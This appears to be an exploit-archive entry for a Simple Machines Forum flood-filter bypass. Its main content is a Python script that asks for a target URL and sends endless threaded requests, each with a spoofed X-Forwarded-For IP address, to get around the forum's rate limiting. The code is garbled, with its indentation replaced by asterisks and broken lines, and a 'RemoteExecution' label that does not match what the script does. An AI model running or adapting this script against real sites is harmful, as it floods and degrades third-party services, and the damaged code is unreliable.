SMF Incorrect Flood Filter Headers

2014.08.22

Credit: Daniel Godoy

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: SMF Incorrect Flood Filter Headers
# Date: 21/08/2014
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software: Simple Machine Forum
# http://www.simplemachines.org
# Tested on: Linux# DORK: Try yourself
* #!/usr/bin/python
* # RemoteExecution
* #Autor: Daniel Godoy A.K.A hielasangre
*
* import sys, threading, time, urllib2,re
* print "Ingrese URL: "
* url = raw_input()
* a = b = c = d = 1
* count = 0
* class SMFPwner(threading.Thread):
* def __init__(self, num):
* threading.Thread.__init__(self)
* self.num = num
* def run(self):
* while 1:
* global a,b,c,d,count, url
* data = ""
* while 1:
* while 1:
* if d!=250:
* d+=1
* else:
* if c!= 250:
* c+=2
* d=0
* else:
* if b!=250:
* c=0
* d=0
* b+=1
* else:
* a+=1
* b=0
* c=0
* d=0
*
head = str(a)+'.'+str(b)+'.'+str(c)+'.'+str(d)
* headers = { 'X-Forwarded-For' : head }
*
req = urllib2.Request(url, data, headers)
* f = urllib2.urlopen(req)
* count += 1
* print "[ Visitando => " + url + " Por
" + str(count) +" vez ]"
* for i in range(3):
* ta = SMFPwner(i)
* ta.start()

References:

http://www.delincuentedigital.com.ar/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SMF Incorrect Flood Filter Headers

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.